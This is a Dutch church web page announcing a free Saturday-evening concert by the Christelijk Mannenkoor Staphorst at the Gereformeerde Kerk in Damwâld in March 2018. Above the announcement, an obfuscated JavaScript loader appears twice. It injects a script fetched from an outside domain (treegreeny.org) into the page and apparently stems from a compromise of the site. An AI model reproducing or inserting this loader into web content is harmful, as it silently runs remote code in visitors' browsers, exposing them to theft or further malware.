;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Zingend naar de Zondag ... - PKN Damwâld
17 maart 2018
19:30 t/m 21:30
de Ontmoeting
Zingend naar de Zondag …

Noteert u alvast in uw agenda de datum: 17 MAART 2018 in de Gereformeerde Kerk aan de Foarwei in Damwald, aanvang 19.30 uur. Toegang gratis. Wij kunnen u alvast vertellen dat wij het Christelijk Mannenkoor Staphorst hebben vastgelegd om op deze 2de avond van Zingend naar de Zondag te komen zingen.
Naast de zang van het Mannenkoor staan er prachtige Paasliederen op het programma voor de samenzang. Tijdens optredens dragen de leden van het Mannenkoor het Staphorster kostuum. Het koor staat bekend om zijn uitgebreide repertoire psalmen, gezangen en geestelijke liederen. Het koor bestaat uit ruim 100 man en werkt regelmatig mee aan EO programma’s zoals ‘’Nederland Zingt’’ en ‘’ Laat ons de rustdag wijden’’. Het koor staat onder de bezielende leiding van dirigent Peter Bos en organist Evan Bogerd. Tevens werkt mee solist Gert Pannekoek bekend van o.a. het TV programma Una Voce Particolare welke werd gepresenteerd door Ernst Daniël Smid. Hopelijk tot ziens en zegt het voort aan vrienden, buren en familie. Wij hopen weer op een volle kerk en een gezegende avond.

Locatie: de OntmoetingFoarwei 38, 9104 BX Damwâld